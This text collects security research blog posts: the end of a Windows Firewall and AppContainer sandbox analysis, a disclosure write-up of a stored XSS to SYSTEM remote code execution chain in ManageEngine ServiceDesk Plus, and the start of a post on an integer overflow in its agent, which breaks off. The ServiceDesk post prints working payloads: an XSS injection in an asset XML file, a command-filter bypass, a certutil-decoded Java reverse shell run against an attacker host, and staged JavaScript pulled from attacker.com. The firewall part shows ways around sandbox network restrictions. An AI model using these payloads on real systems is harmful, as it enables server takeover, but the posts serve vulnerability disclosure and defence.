
Select-Object ActionType, Name

...

Permit     Allow outbound TCP traffic from dmcertinst.exe

Permit     Allow outbound TCP traffic from omadmclient.exe

Permit     Allow outbound TCP traffic from deviceenroller.exe

Permit     InternetClient Default Rule

Permit     InternetClientServer Outbound Default Rule

Block      Block all outbound traffic from SearchFilterHost

Block      Block outbound traffic from dmcertinst.exe

Block      Block outbound traffic from omadmclient.exe

Block      Block outbound traffic from deviceenroller.exe

Block      Block Outbound Default Rule

Block      WSH Default Outbound Block

PS> Get-FwFilter -Id 72753 | Format-FwFilter

Name       : Allow outbound TCP traffic from dmcertinst.exe

Action Type: Permit

Key        : 5237f74f-6346-4038-a48d-4b779f862e65

Id         : 72753

Description:

Layer      : FWPM_LAYER_ALE_AUTH_CONNECT_V4

Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_WSH

Flags      : Indexed

Weight     : 422487342972928

Conditions :

FieldKeyName               MatchType Value

------------               --------- -----

FWPM_CONDITION_ALE_APP_ID  Equal    

\device\harddiskvolume3\windows\system32\dmcertinst.exe

FWPM_CONDITION_IP_PROTOCOL Equal     Tcp

As we can see in the output there are quite a few Permit filters before the “Block Outbound Default Rule” filter, and of course I've also cropped the list to make it smaller. If we inspect the “Allow outbound TCP traffic from dmcertinst.exe” filter we find that it only matches on the App ID and the IP protocol. As it doesn't have an AppContainer specific checks, then any sockets created in the context of a dmcertinst process would be permitted to make TCP connections.

Once the “Allow outbound TCP traffic from dmcertinst.exe” filter matches the sublayer evaluation is terminated and it never reaches the “Block Outbound Default Rule” filter. This is fairly trivial to exploit, as long as the AppContainer process is allowed to spawn new processes, which is allowed by default.

Server Capabilities

What about the internetClientServer capability, how does that function? First, there's a second set of outbound filters to cover the capability with the same network addresses as the base internetClient capability. The only difference is the FWPM_CONDITION_ALE_USER_ID condition checks for the internetClientServer (S-1-15-3-2) capability instead. For inbound connections the FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4 layer contains the filter.

PS> Get-FwFilter -AleLayer RecvAcceptV4 -Sorted |

Where-Object Name -Match InternetClientServer |

Format-FwFilter

Name       : InternetClientServer Inbound Default Rule

Action Type: Permit

Key        : 45c5f1d5-6ad2-4a2a-a605-4cab7d4fb257

Id         : 72470

Description: InternetClientServer Inbound Default Rule

Layer      : FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4

Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_WSH

Flags      : None

Weight     : 824633728960

Conditions :

FieldKeyName                       MatchType Value

------------                       --------- -----

FWPM_CONDITION_ALE_PACKAGE_ID      NotEqual  NULL SID

FWPM_CONDITION_IP_REMOTE_ADDRESS   Range    

Low: 0.0.0.0 High: 255.255.255.255

FWPM_CONDITION_ORIGINAL_PROFILE_ID Equal     Public

FWPM_CONDITION_CURRENT_PROFILE_ID  Equal     Public

FWPM_CONDITION_ALE_USER_ID         Equal    

O:LSD:(A;;CC;;;S-1-15-3-2)(A;;CC;;;WD)(A;;CC;;;AN)

The example shows the filter for a Public network interface granting an AppContainer application the ability to receive network connections. However, this will only be permitted if the socket creator has internetClientServer capability. Note, there would be similar rules for the private network if the network interface is marked as Private but only granting access with the privateNetworkClientServer capability.

As mentioned earlier just because an application has one of these capabilities doesn't mean it can receive network connections. The default configuration will block the inbound connection.  However, when an UWP application is installed and requires one of the two server capabilities, the AppX installer service registers the AppContainer profile with the Windows Defender Firewall service. This adds a filter to permit the AppContainer package to receive inbound connections. For example the following is for the Microsoft Photos application, which is typically installed by default:

PS> Get-FwFilter -Id 68299 |

Format-FwFilter -FormatSecurityDescriptor -Summary

Name       : @{Microsoft.Windows.Photos_2021...

Action Type: Permit

Key        : 7b51c091-ed5f-42c7-a2b2-ce70d777cdea

Id         : 68299

Description: @{Microsoft.Windows.Photos_2021...

Layer      : FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4

Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_FIREWALL

Flags      : Indexed

Weight     : 10376294366095343616

Conditions :

FieldKeyName                  MatchType Value

------------                  --------- -----

FWPM_CONDITION_ALE_PACKAGE_ID Equal    

microsoft.windows.photos_8wekyb3d8bbwe

FWPM_CONDITION_ALE_USER_ID    Equal     O:SYG:SYD:(A;;CCRC;;;S-1-5-21-3563698930-1433966124...

<Owner> (Defaulted) : NT AUTHORITY\SYSTEM

<Group> (Defaulted) : NT AUTHORITY\SYSTEM

<DACL>

DOMAIN\alice: (Allowed)(None)(Full Access)

APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:...

APPLICATION PACKAGE AUTHORITY\Your Internet connection:...

APPLICATION PACKAGE AUTHORITY\Your Internet connection,...

APPLICATION PACKAGE AUTHORITY\Your home or work networks:...

NAMED CAPABILITIES\Proximity: (Allowed)(None)(Full Access)

The filter only checks that the package SID matches and that the socket creator is a specific user in an AppContainer. Note this rule doesn't do any checking on the executable file, remote IP address, port or profile ID. Once an installed AppContainer application is granted a server capability it can act as a server through the firewall for any traffic type or port.

A normal application could abuse this configuration to run a network service without needing the administrator access normally required to grant the executable access. All you'd need to do is create an arbitrary AppContainer process in the permitted package and grant it the internetClientServer and/or the privateNetworkClientServer capabilities. If there isn't an application installed which has the appropriate firewall rules a non-administrator user can install any signed application with the appropriate capabilities to add the firewall rules. While this clearly circumvents the expected administrator requirements for new listening processes it's presumably by design.

Localhost Access

One of the specific restrictions imposed on AppContainer applications is blocking access to localhost. The purpose of this is it makes it more difficult to exploit local network services which might not correctly handle AppContainer callers creating a sandbox escape. Let's test the behavior out and try to connect to a localhost service.

PS> $token = Get-NtToken -LowBox -PackageSid "LOOPBACK"

PS> Invoke-NtToken $token {

    [System.Net.Sockets.TcpClient]::new("127.0.0.1", 445)

}

Exception calling ".ctor" with "2" argument(s): "A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because

connected host has failed to respond 127.0.0.1:445"

If you compare the error to when we tried to connect to an internet address without the appropriate capability you'll notice it's different. When we connected to the internet we got an immediate error indicating that access isn't permitted. However, for localhost we instead get a timeout error, which is preceded by multi-second delay. Why the difference? Getting the network event which corresponds to the connection and displaying the blocking filter shows something interesting.

PS> Get-FwFilter -Id 69039 |

Format-FwFilter -FormatSecurityDescriptor -Summary

Name       : AppContainerLoopback

Action Type: Block

Key        : a58394b7-379c-43ac-aa07-9b620559955e

Id         : 69039

Description: AppContainerLoopback

Layer      : FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4

Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_WSH

Flags      : None

Weight     : 18446744073709551614

Conditions :

FieldKeyName               MatchType   Value

------------               ---------   -----

FWPM_CONDITION_FLAGS       FlagsAllSet IsLoopback

FWPM_CONDITION_ALE_USER_ID Equal      

O:LSD:(A;;CC;;;AC)(A;;CC;;;S-1-15-3-1)(A;;CC;;;S-1-15-3-2)...

<Owner> : NT AUTHORITY\LOCAL SERVICE

<DACL>

APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES...

APPLICATION PACKAGE AUTHORITY\Your Internet connection...

APPLICATION PACKAGE AUTHORITY\Your Internet connection, including...

APPLICATION PACKAGE AUTHORITY\Your home or work networks...

NAMED CAPABILITIES\Proximity: (Allowed)(None)(Match)

Everyone: (Allowed)(None)(Match)

NT AUTHORITY\ANONYMOUS LOGON: (Allowed)(None)(Match)

The blocking filter is not in the connect layer as you might expect, instead it's in the receive/accept layer. This explains why we get a timeout rather than immediate failure: the “inbound” connection request is being dropped as per the default configuration. This means the TCP client waits for the response from the server, until it eventually hits the timeout limit.

The second interesting thing to note about the filter is it's not based on an IP address such as 127.0.0.1. Instead it's using a condition which checks for the IsLoopback condition flag (FWP_CONDITION_FLAG_IS_LOOPBACK in the SDK). This flag indicates that the connection is being made through the built-in loopback network, regardless of the destination address. Even if you access the public IP addresses for the local network interfaces the packets will still be routed through the loopback network and the condition flag will be set.

The user ID check is odd, in that the security descriptor matches either AppContainer or non-AppContainer processes. This is of course the point, if it didn't match both then it wouldn't block the connection. However, it's not immediately clear what its actual purpose is if it just matches everything. In my opinion, it adds a risk that the filter will be ignored if the socket creator has disabled the Everyone group.  This condition was modified for supporting LPAC over Windows 8, so it's presumably intentional.

You might ask, if the filter would block any loopback connection regardless of whether it's in an AppContainer, how do loopback connections work for normal applications? Wouldn't this filter always match and block the connection?  Unsurprisingly there are some additional permit filters before the blocking filter as shown below.

PS> Get-FwFilter -AleLayer RecvAcceptV4 -Sorted |

Where-Object Name -Match AppContainerLoopback | Format-FwFilter

Name       : AppContainerLoopback

Action Type: Permit

...

Conditions :

FieldKeyName         MatchType   Value

------------         ---------   -----

FWPM_CONDITION_FLAGS FlagsAllSet IsAppContainerLoopback

Name       : AppContainerLoopback

Action Type: Permit

...

Conditions :

FieldKeyName         MatchType   Value

------------         ---------   -----

FWPM_CONDITION_FLAGS FlagsAllSet IsReserved

Name       : AppContainerLoopback

Action Type: Permit

...

Conditions :

FieldKeyName         MatchType   Value

------------         ---------   -----

FWPM_CONDITION_FLAGS FlagsAllSet IsNonAppContainerLoopback

The three filters shown above only check for different condition flags, and you can find documentation for the flags on MSDN. Starting at the bottom we have a check for IsNonAppContainerLoopback. This flag is set on a connection when the loopback connection is between non-AppContainer created sockets. This filter is what grants normal applications loopback access. It's also why an application can listen on localhost even if it's not granted access to receive connections from the network in the firewall configuration.

In contrast the first filter checks for the IsAppContainerLoopback flag. Based on the documentation and the name, you might assume this would allow any AppContainer to use loopback to any other. However, based on testing this flag is only set if the two AppContainers have the same package SID. This is presumably to allow an AppContainer to communicate with itself or other processes within its package through loopback sockets.

This flag is also, I suspect, the reason that connecting to a loopback socket is handled in the receive layer rather than the connect layer. Perhaps WFP can't easily tell ahead of time whether both the connecting and receiving sockets will be in the same AppContainer package, so it delays resolving that until the connection has been received. This does lead to the unfortunate behavior that blocked loopback sockets timeout rather than fail immediately.

The final flag, IsReserved is more curious. MSDN of course says this is “Reserved for future use.”, and the future is now. Though checking back at the filters in Windows 8.1 also shows it being used, so if it was reserved it wasn't for very long. The obvious conclusion is this flag is really a “Microsoft Reserved” flag, by that I mean it's actually used but Microsoft is yet unwilling to publicly document it.

What is it used for? AppContainers are supposed to be a capability based system, where you can just add new capabilities to grant additional privileges. It would make sense to have a loopback capability to grant access, which could be restricted to only being used for debugging purposes. However, it seems that loopback access was so beyond the pale for the designers that instead you can only grant access for debug purposes through an administrator only API. Perhaps it's related?

PS> Add-AppModelLoopbackException -PackageSid "LOOPBACK"

PS> Get-FwFilter -AleLayer ConnectV4 |

Where-Object Name -Match AppContainerLoopback |

Format-FwFilter -FormatSecurityDescriptor -Summary

Name       : AppContainerLoopback

Action Type: CalloutInspection

Key        : dfe34c0f-84ca-4af1-9d96-8bf1e8dac8c0

Id         : 54912247

Description: AppContainerLoopback

Layer      : FWPM_LAYER_ALE_AUTH_CONNECT_V4

Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_WSH

Flags      : None

Weight     : 18446744073709551615

Callout Key: FWPM_CALLOUT_RESERVED_AUTH_CONNECT_LAYER_V4

Conditions :

FieldKeyName               MatchType Value

------------               --------- -----

FWPM_CONDITION_ALE_USER_ID Equal     D:(A;NP;CC;;;WD)(A;NP;CC;;;AN)(A;NP;CC;;;S-1-15-3-1861862962-...

<DACL>

Everyone: (Allowed)(NoPropagateInherit)(Match)

NT AUTHORITY\ANONYMOUS LOGON: (Allowed)(NoPropagateInherit)(Match)

PACKAGE CAPABILITY\LOOPBACK: (Allowed)(NoPropagateInherit)(Match)

LOOPBACK: (Allowed)(NoPropagateInherit)(Match)

First we add a loopback exemption for the LOOPBACK package name. We then look for the AppContainerLoopback filters in the connect layer. The one we're interested in is shown. The first thing to note is that the action type is set to CalloutInspection. This might seem slightly surprising, you would expect it'd do something more than inspecting the traffic.

The name of the callout, FWPM_CALLOUT_RESERVED_AUTH_CONNECT_LAYER_V4 gives the game away. The fact that it has RESERVED in the name can't be a coincidence. This callout is one implemented internally by Windows in the TCPIP!WfpAlepDbgLowboxSetByPolicyLoopbackCalloutClassify function. This name now loses all mystery and pretty much explains what its purpose is, which is to configure the connection so that the IsReserved flag is set when the receive layer processes it.

The user ID here is equally important. When you register the loopback exemption you only specify the package SID, which is shown in the output as the last “LOOPBACK” line. Therefore you'd assume you'd need to always run your code within that package. However, the penultimate line is “PACKAGE CAPABILITY\LOOPBACK” which is my module's way of telling you that this is the package SID, but converted to a capability SID. This is basically changing the first relative identifier in the SID from 2 to 3.

We can use this behavior to simulate a generic loopback exemption capability. It allows you to create an AppContainer sandboxed process which has access to localhost which isn't restricted to a particular package. This would be useful for applications such as Chrome to implement a network facing sandboxed process and would work from Windows 8 through 11. . Unfortunately it's not officially documented so can't be relied upon. An example demonstrating the use of the capability is shown below.

PS> $cap = Get-NtSid -PackageSid "LOOPBACK" -AsCapability

PS> $token = Get-NtToken -LowBox -PackageSid "TEST" -cap $cap

PS> $sock = Invoke-NtToken $token {

    [System.Net.Sockets.TcpClient]::new("127.0.0.1", 445)

}

PS> $sock.Client.RemoteEndPoint

AddressFamily Address   Port

------------- -------   ----

 InterNetwork 127.0.0.1  445

Conclusions

That wraps up my quick overview of how AppContainer network restrictions are implemented using the Windows Firewall. I covered the basics of the Windows Firewall as well as covered some of my tooling I wrote to do analysis of the configuration. This background information allowed me to explain why the issue I reported to Microsoft worked. I also pointed out some of the quirks of the implementation which you might find of interest.

Having a good understanding of how a security feature works is an important step towards finding security issues. I hope that by providing both the background and tooling other researchers can also find similar issues and try and get them fixed.

Stored XSS to RCE Chain as SYSTEM in ManageEngine ServiceDesk Plus

17 August 2021 at 13:02

The unauthorized access of FireEye red team tools was an eye-opening event for the security community. In my personal opinion, it was especially enlightening to see the “prioritized list of CVEs that should be addressed to limit the effectiveness of the Red Team tools.” This list can be found on FireEye’s GitHub. The list reads to me as though these vulnerabilities are probably being exploited during FireEye red team engagements. More than likely, the listed products are commonly found in target environments. As a 0-day bug hunter, this screams out, “hunt me!” So we did.

Last, but not least, on the list is “CVE-2019–8394 — arbitrary pre-auth file upload to ZoHo ManageEngine ServiceDesk Plus.” A Shodan search for “ManageEngine ServiceDesk Plus” in the page title reveals over 5,000 public-facing instances. We chose to target this product, and we found some high impact vulnerabilities. On one hand, we’ve found a way to fully compromise the server, and on the other, we can exploit the agent software. This is a pentester’s pivoting playground.

Our story will be split into two blogs. Pivot over to David Wells’ related blog to check out a mind-bending heap overflow in the AssetExplorer Agent. For bugs on the server-side stay tuned.

TLDR

ManageEngine ServiceDesk Plus, prior to version 11200, is susceptible to a vulnerability chain leading to unauthenticated remote code execution. An unauthenticated, remote attacker is able to upload a malicious asset to the help desk. Once an unknowing help desk administrator views this new asset, the attacker can take control of the help desk application and fully compromise the underlying operating system.

The two flaws in the exploit chain include an unauthenticated stored cross-site scripting vulnerability (CVE-2021–20080) and a case of weak input validation (CVE-2021–20081) leading to arbitrary code execution. Initial access is first gained via cross-site scripting, and once triggered, the attacker can schedule the execution of malicious code with SYSTEM privileges. Below I have detailed these vulnerabilities.

Gaining a Foothold via XML Asset Ingestion

A key component of an IT service desk is the ability to manage assets. For example, company laptops, desktops, etc would likely be provisioned by IT and managed in a service desk software.

In ManageEngine ServiceDesk Plus (SDP), there is an API endpoint that allows an unauthenticated HTTP client to upload XML files containing asset definitions. The asset definition file allows all sorts of details to be defined, such as make, model, operating system, memory, network configuration, software installed, etc.

When a valid asset is POSTed to /discoveryServlet/WsDiscoveryServlet, an XML file is created on the server’s file system containing the asset. This file will be stored at C:\Program Files\ManageEngine\ServiceDesk\scannedxmls.

After a minute or so, it will be automatically picked up by SDP for processing. The asset will then be stored in the database, and it will be viewable as an asset in the administrative web user interface.

Below is an example of a Mac asset being uploaded. For the sake of brevity, I’ve left out most of the XML file. The key component is bolded on the line starting with “inet” in the “/sbin/ifconfig” output. The full proof of concept (PoC) can be found on our TRA-2021–11 research advisory.

Notice that the IP address contains JavaScript code to fire an alert. This is where the vulnerability rears its ugly head. The injected JavaScript will not be sanitized prior to being loaded in a web browser. Hence, the attacker can execute arbitrary JavaScript and abuse this flaw to perform administrative actions in the help desk application.

<?xml version="1.0" encoding="UTF-8" ?><DocRoot>
… snip ...
<NIC_Info><command>/sbin/ifconfig</command><output><![CDATA[
en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
options=400<CHANNEL_IO>
ether 8c:85:90:d4:a6:e9
inet6 fe80::103b:588a:7772:e9db%en0 prefixlen 64 secured scopeid 0x5
inet ');}{alert("xss");// netmask 0xffffff00 broadcast 192.168.0.255
nd6 options=201<PERFORMNUD,DAD>
media: autoselect
status: active
]]></output></NIC_Info>
… snip ...
</DocRoot>

Let’s assume this XML is processed by SDP. When the administrator views this specific asset in SDP, a JavaScript alert would fire.

It’s pretty clear here that a stored cross-site scripting vulnerability exists, and we’ve assigned it as CVE-2021–20080. The root cause of this vulnerability is that the IP address is used to construct a JavaScript function without sanitization. This allows us to inject malicious JavaScript. In this case, the function would be constructed as such:

function clickToExpandIP(){
jQuery('#ips').text('[ ');}{alert("xss");// ]');
}

Notice how I closed the text() function call and the clickToExpandIP() function definition.

.text('[ ');}

After this, since there is a hanging closing curly brace on the next line, I start a new block, call alert, and comment out the rest of the line.

{alert("xss");//

Alert! We won’t stop here. Let’s ride the victim administrator’s session.

Reusing the HttpOnly Cookies

When a user logs in, the following session cookies are set in the response:

Set-Cookie: SDPSESSIONID=DC6B4FDF88491030FD4CE332509EE267; Path=/; HttpOnly
Set-Cookie: JSESSIONIDSSO=167646B5D793A91BC5EA12C1CAB9BEAB; Path=/; HttpOnly

The cookies have the HttpOnly flag set, which prevents JavaScript from accessing these cookie values directly. However, that doesn’t mean we can’t reuse the cookies in an XMLHttpRequest. The cookies will be included in the request, just as if it were a form submission.

The problem here is that a CSRF token is also in play. For example, if a user were to be deleted, the following request would fire.

DELETE /api/v3/users?ids=9 HTTP/1.1
Host: 172.26.31.177:8080
Content-Length: 160
Cache-Control: max-age=0
Accept: application/json, text/javascript, */*; q=0.01
X-ZCSRF-TOKEN: sdpcsrfparam=07b3f63e7109455ca9e1fad3871e92feb7aa22c086d43e0dfb3f09c0e9d77163481dc8e914422808f794c020c6e9e93fc0f9de633dab681eefe356bb9d18a638
X-Requested-With: XMLHttpRequest
If-Modified-Since: Thu, 1 Jan 1970 00:00:00 GMT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://172.26.31.177:8080
Referer: http://172.26.31.177:8080/SetUpWizard.do?forwardTo=requester&viewType=list
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SDPSESSIONID=DC6B4FDF88491030FD4CE332509EE267; JSESSIONIDSSO=167646B5D793A91BC5EA12C1CAB9BEAB; PORTALID=1; sdpcsrfcookie=07b3f63e7109455ca9e1fad3871e92feb7aa22c086d43e0dfb3f09c0e9d77163481dc8e914422808f794c020c6e9e93fc0f9de633dab681eefe356bb9d18a638; _zcsr_tmp=07b3f63e7109455ca9e1fad3871e92feb7aa22c086d43e0dfb3f09c0e9d77163481dc8e914422808f794c020c6e9e93fc0f9de633dab681eefe356bb9d18a638; memarketing-_zldp=Mltw9Iqq5RScV1w4XmHqtfyjDzbcGg%2Fgj2ZFSsChk9I%2BFeA4HQEbmBi6kWOCHoEBmdhXfrM16rA%3D; memarketing-_zldt=35fbbf7a-4275-4df4-918f-78167bc204c4-0
Connection: close
sdpcsrfparam=07b3f63e7109455ca9e1fad3871e92feb7aa22c086d43e0dfb3f09c0e9d77163481dc8e914422808f794c020c6e9e93fc0f9de633dab681eefe356bb9d18a638&SUBREQUEST=XMLHTTP

Notice the use of the ‘X-ZCSRF-TOKEN’ header and the ‘sdpcsrfparam’ request parameter. The token value is also passed in the ‘sdpcsrfcookie’ and ‘_zcsr_tmp’ cookies. This means subsequent requests won’t succeed unless we set the proper CSRF headers and cookies.

However, when the CSRF cookies are set, they do not set the HttpOnly flag. Because of this, our malicious JavaScript can harvest the value of the CSRF token in order to provide the required headers and request data.

Putting it all together, we are able to send an XMLHttpRequest:

  • with the proper session cookie values
  • and with the required CSRF token values.

No Spaces Allowed

Another fun roadblock was the fact that spaces couldn’t be included in the IP address. If we were to specify the line with “AN IP” as the IP address:

inet AN IP netmask 0xffffff00 broadcast 192.168.0.255

The JavaScript function would be generated as such:

function clickToExpandIP(){
jQuery('#ips').text('[ AN ]');
}

Notice that ‘IP’ was truncated. This is due to the way that ServiceDesk Plus parses the IP address field. It expects an IP address followed by a space, so the “IP” text would be truncated in this case.

However, this can be bypassed using multiline comments to replace spaces.

');}{var/**/text="stillxss";alert(text);//

Putting these pieces together, this means when we exploit the XSS, and the administrator views our malicious asset, we can fire valid (and complex) application requests with administrative privileges. In particular, I ended up abusing the custom scheduled task feature.

Code Execution via a Malicious Custom Schedule

Being an IT service desk software, ManageEngine ServiceDesk Plus has loads of functionality. Similar to other IT software out there, it allows you to create custom scheduled tasks. Also similar to other IT software, it lets you run system commands. With powerful functionality, there is a fine line separating a vulnerability and a feature that simply works as designed. In this case, there is a clear vulnerability (CVE-2021–20081).

Custom Schedule Screen

Above I have pasted a screen shot of the form that allows an administrator to create a custom schedule. Notice the executor example in the Action section. This allows the administrator to run a command on a scheduled basis.

Dangerous, yes. A vuln? Not yet. It’s by design.

What happens if the administrator wants to write some text to the file system using this feature?

Administrator attempts to write to C:\test.txt

Interestingly, “echo” is a restricted word. Clearly a filter is in place to deny this word, probably for cases like this. After some code review, I found an XML file defining a list of restricted words.

C:\Program Files\ManageEngine\ServiceDesk\conf\Asset\servicedesk.xml:

<GlobalConfig globalconfigid="GlobalConfig:globalconfigid:2600" category="Execute_Script" parameter="Restricted_Words" paramvalue="outfile,Out-File,write,echo,OpenTextFile,move,Move-Item,move,mv,MoveFile,del,Remove-Item,remove,rm,unlink,rmdir,DeleteFile,ren,Rename-Item,rename,mv,cp,rm,MoveFile" description="Script Restricted Words"/>

Notice the word “echo” and a bunch of other words that all seem to relate to file system operations. Clearly the developer did not want to allow a custom scheduled task to explicitly modify files.

If we look at com.adventnet.servicedesk.utils.ServiceDeskUtil.java, we can see how the filter is applied.

public String[] getScriptRestrictedWords() throws Exception {
String restrictedWords = GlobalConfigUtil.getInstance().getGlobalConfigValue("Restricted_Words", "Execute_Script");
return restrictedWords.split(",");
}
public Set containsScriptRestrictedWords(String input) throws Exception {
HashSet<String> input_words = new HashSet<String>();
input_words.addAll(Arrays.asList(input.split(" ")));
input_words.retainAll(Arrays.asList(this.getScriptRestrictedWords()));
return input_words;
}

Most notably, the command line input string is split into words using a space character as a delimiter.

input_words.addAll(Arrays.asList(input.split(" ")));

This method of blocking commands containing restricted words is simply inadequate, and this is where the vulnerability comes into play. Let me show you how this filter can be bypassed.

One bypass for this involves the use of commas (or semicolons) to delimit the arguments of a command. For example, all of these commands are equivalent.

c:\>echo "Hello World"
"Hello World"
c:\>echo,"Hello World"
"Hello World"
c:\>echo;"Hello World"
"Hello World"

With this in mind, an administrator could craft a command with commas to write to disk. For example:

cmd /c "echo,testing > C:\\test.txt"

Even better, the command will execute with NT AUTHORITY\SYSTEM privileges. Sysinternals Process Monitor will prove that:

Pop a Shell

I opted for a Java-based reverse shell since I knew a Java executable would be shipped with ServiceDesk Plus. It is written in Java, after all. The command line contains the following logic.

I first used ‘echo’ to write out a Base64-encoded Java class.

echo,<Base64 encoded Java reverse shell class>> b64file

After that I used ‘certutil’ to decode the data into a functioning Java class. Thanks to Casey Dunham for the awesome Java reverse shell.

certutil -f -decode b64file ReverseTcpShell.class

And finally, I used the provided Java executable to launch a reverse shell that connects back to the attacker’s listener at IP:port.

C:\\PROGRA~1\\ManageEngine\\ServiceDesk\\jre\\bin\\java.exe ReverseTcpShell <attacker ip> <attacker port>

Chaining these Together

From a high level, an exploit chain looks like the following:

  1. Send an XML asset file to SDP containing our malicious JavaScript code.
  2. After a short period of time, SDP will process the XML file and add the asset.
  3. When the administrator views the asset, the JavaScript fires. This can be encouraged by sending a link to the administrator.
  4. The JavaScript will create a malicious custom scheduled task to execute in 1 minute.
  5. After one minute, the scheduled task executes, and a reverse shell connects back to the attacker’s machine.

This is the basic overview of a full exploit chain. However, there was a wrench thrown in that I’d like to mention. Namely, there was a maximum length enforced. Due to the length of a reverse shell payload, this restriction required me to use a staged approach.

Let me show you.

Staging the Custom Schedule

In order to solve this problem, I set up an HTTP listener that, when contacted by my XSS payload, would send more JavaScript code back to the browser. The XSS would then call eval() on this code, thereby loading another stage of JavaScript code.

So basically, the initial XSS payload contains enough code to reach out to the attacker’s HTTP server, and downloads another stage of JavaScript to be executed using eval(). Something like this:

function loaded() {
eval(this.responseText);
}
var req = new XMLHttpRequest();
req.addEventListener("load", loaded);
req.open("GET","http://attacker.com/more_js");
req.send(null);

Once the JavaScript downloads, the loaded() function fires. The one catch is that since we’re in the browser, a CORS header needs to be set by the attacker’s listener:

Access-Control-Allow-Origin: *

This will tell the browser it’s okay to load the attacker server’s content in the ServiceDesk Plus application, since they’re cross-origin. Using this strategy, a massive chunk of JavaScript can be loaded. With all of this in mind, a full exploit can be constructed like so:

  1. Send an XML asset file to SDP containing our malicious JavaScript code.
  2. After a short period of time, SDP will process the XML file and add the asset.
  3. When the administrator views the asset, the JavaScript fires. This can be encouraged by sending a link to the administrator.
  4. The XSS will download more JavaScript from the attacker’s HTTP server.
  5. The downloaded JavaScript will create a malicious custom scheduled task to execute in 1 minute.
  6. After one minute, the scheduled task executes, and a reverse shell connects back to the attacker’s machine.

Let’s see all of this in action:

https://www.youtube.com/watch?v=DhrJxVqmsIo

Wrapping Up

We’ve now seen how an unauthenticated attacker can exploit a cross-site scripting vulnerability to gain remote code execution in ManageEngine ServiceDesk Plus. As I said earlier, David Wells has managed to exploit a heap overflow in the AssetExplorer agent software. If you’re an SDP or AssetExplorer server administrator, this is the agent software that you would distribute to assets on the network. This vulnerability would allow an attacker to pivot from SDP to agents. As you might imagine this is a dangerous attack scenario.

ManageEngine did a solid job of patching. I reported the bugs on March 17, 2021. The XSS was patched by April 07, 2021, and the RCE was patched by June 1, 2021. That’s a fast turnaround!

For more detailed information on the vulnerabilities, take a look at our research advisories: TRA-2021–11 and TRA-2021–22.


Stored XSS to RCE Chain as SYSTEM in ManageEngine ServiceDesk Plus was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Integer Overflow to RCE — ManageEngine Asset Explorer Agent (CVE-2021–20082)

17 August 2021 at 13:02

Integer Overflow to RCE — ManageEngine Asset Explorer Agent (CVE-2021–20082)

A couple months back, Chris Lyne and I had a look at ManageEngine ServiceDesk Plus. This product consists of a server / agent model in which agents provide updates on machine status back to the Manage Engine server. Chris ended up finding an unauth XSS-to-RCE chain in the server component which you can read here: https://medium.com/tenable-techblog/stored-xss-to-rce-chain-as-system-in-manageengine-servicedesk-plus-493c10f3e444, allowing an attacker to fully compromise the server with SYSTEM privileges.

The blog here will go over the exploitation of an integer overflow that I found in the agents themselves (CVE-2021–20082) called Asset Explorer Agent. This exploit could allow an attacker to pivot the network once the ManageEngine server is compromised. Alternatively, this could be exploited by spoofing the ManageEngine server IP on the network and triggering this vulnerability as we will touch on later. While this PoC is not super reliable, it has been proven to work after several tries on a Windows 10 Pro 20H2 box (see below). I believe that further work on heap grooming could increase exploitation odds.

Linux machine (left), remotely exploiting integer overflow in ManageEngine Asset Explorer running on Windows 10 (right) and popping up a “whoami” dialog.

Attack Vector

The ManageEngine Windows agent executes as a SYSTEM service and listens on the network for commands from its ManageEngine server. While TLS is used for these requests, the agent never validates the certificate, so anyone on the network is able to perform this TLS handshake and send an unauthorized command to the agent. In order for the agent to run the command however, the agent expects to receive an authtoken, which it echos back to its configured server IP address for final approval. Only then will the agent carry out the command. This presents a small problem since that configured IP address is not ours, and instead asks the real Manage Engine server to approve our sent authtoken, which is always going to be denied.

There is a way an attacker can exploit this design however and that’s by spoofing their IP on the network to be the Manage Engine server. I mentioned certs are not validated which allows an attacker to send and receive requests without an issue. This allows full control over the authtoken approval step, resulting in the agent running any arbitrary agent command from an attacker.

From here, you may think there is a command that can remotely run tasks or execute code on agents. Unfortunately, this was not the case, as the agent is very lightweight and supports a limited amount of features, none of which allowed for logical exploitation. This forced me to look into memory corruption in order to gain remote code execution through this vector. From reverse engineering the agents, I found a couple of small memory handling issues, such as leaks and heap overflow with unicode data, but nothing that led me to RCE.

Integer Overflow

When the agent receives final confirmation from its server, it is in the form of a POST request from the Manage Engine server. Since we are assuming the attacker has been able to insert themselves as a fake Manage Engine server or have compromised a real Manage Engine server, this allows them to craft and send any POST response to this agent.

When the agent processes this POST request, WINAPIs for HTTP handling are used. One of which is HttpQueryInfoW, which is used to query the incoming POST request for its “Content-Size” field. This Content-Size field is then used as a size parameter in order to allocate memory on the heap to copy over the POST payload data.

There is some integer arithmetic performed between receiving the Content-Size field and actually using this size to allocate heap memory. This is where we can exploit an integer overflow.

Here you can see the Content-Size is incremented by one, multiplied by four, and finally incremented by an extra two bytes. This is a 32-bit agent, using 32-bit integers, which means if we supply a Content-Size field the size of UINT32_MAX/4, we should be able to overflow the integer to wrap back around to size 2 when passed to calloc. Once this allocation of only two bytes is made on the heap, the following API InternetReadFile, will copy over our POST payload data to the destination buffer until all its POST data contents are read. If our POST data is larger than two bytes, then that data will be copied beyond the two byte buffer resulting in heap overflow.

Things are looking really good here because we not only can control the size of the heap overflow (tailoring our post data size to overwrite whatever amount of heap memory), but we also can write non-printable characters with this overflow, which is always good for exploiting write conditions.

No ASLR

